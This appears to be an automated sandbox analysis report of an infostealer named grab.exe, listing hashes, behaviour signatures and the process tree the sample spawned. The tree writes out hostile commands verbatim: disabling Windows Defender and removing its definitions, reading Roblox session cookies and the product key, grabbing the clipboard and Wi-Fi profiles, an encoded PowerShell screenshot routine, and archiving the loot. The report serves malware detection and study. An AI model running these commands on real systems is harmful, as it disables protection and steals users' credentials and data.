Analysis

  • max time kernel
    30s
  • max time network
    24s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 09:52

General

  • Target

    grab.exe

  • Size

    7.5MB

  • MD5

    553d236d2a6a0a4ca78641f9a932ecaa

  • SHA1

    3b0354f24b67f16efd93afcb95540886ef091490

  • SHA256

    5ec487769f184e246bef6dc014df3eed2193d22c7887b0adedc4bb69299f8cf4

  • SHA512

    e575738994a46704f14d44b9e38b3f9b67f2d507eb7fce7ada95b6dfe5697b783137de20dc88004f5fae964ffbcd47880447d6b07c2024353c7f926054333bc6

  • SSDEEP

    196608:FyQsJbT/9bvLz3S1bA32O5iJdYW0+S5/Ukgdv:uJbTlj3S1bO2g8c+Si5

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\grab.exe
    "C:\Users\Admin\AppData\Local\Temp\grab.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1020
    • C:\Users\Admin\AppData\Local\Temp\grab.exe
      "C:\Users\Admin\AppData\Local\Temp\grab.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\grab.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\grab.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3492
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4412
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4900
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:388
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3592
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2984
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:3240
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3920
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:2488
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:448
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:844
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1136
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‌   .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2412
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‌   .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4528
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
              PID:2432
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4320
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4412
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5108
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:216
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                  PID:3568
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2740
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2956
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:3852
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  3⤵
                    PID:3396
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                        PID:4732
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4076
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:4632
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:5116
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3160
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xvfb3s34\xvfb3s34.cmdline"
                            5⤵
                              PID:644
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63CB.tmp" "c:\Users\Admin\AppData\Local\Temp\xvfb3s34\CSC7D7E8CDAB0CA4E51ADE919599E7B8DF9.TMP"
                                6⤵
                                  PID:3520
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:3336
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:2112
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:4472
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2716
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4484
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:4324
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:1616
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:3980
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:4380
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:4360
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:1224
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:4924
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:3776
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:384
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      3⤵
                                                        PID:1344
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          4⤵
                                                            PID:448
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2112
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "getmac"
                                                          3⤵
                                                            PID:3320
                                                            • C:\Windows\system32\getmac.exe
                                                              getmac
                                                              4⤵
                                                                PID:3796
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10202\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\8oMFM.zip" *"
                                                              3⤵
                                                                PID:3756
                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI10202\rar.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI10202\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\8oMFM.zip" *
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:2644
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                3⤵
                                                                  PID:4432
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic os get Caption
                                                                    4⤵
                                                                      PID:2956
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                    3⤵
                                                                      PID:396
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic computersystem get totalphysicalmemory
                                                                        4⤵
                                                                          PID:4860
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                        3⤵
                                                                          PID:4872
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic csproduct get uuid
                                                                            4⤵
                                                                              PID:2984
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                            3⤵
                                                                              PID:444
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                4⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2920
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                              3⤵
                                                                                PID:1444
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic path win32_VideoController get name
                                                                                  4⤵
                                                                                  • Detects videocard installed
                                                                                  PID:4468
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                3⤵
                                                                                  PID:1044
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    4⤵
                                                                                      PID:4360
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                      4⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4068
                                                                              • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                C:\Windows\System32\WaaSMedicAgent.exe d0e34fc860bf0d5d2b3aacd4748f93d2 w7icVmGa6Eu/pl4QuyPnAA.0.1.0.0.0
                                                                                1⤵
                                                                                  PID:4924
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    2⤵
                                                                                      PID:1224

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                  Execution

                                                                                  Command and Scripting Interpreter
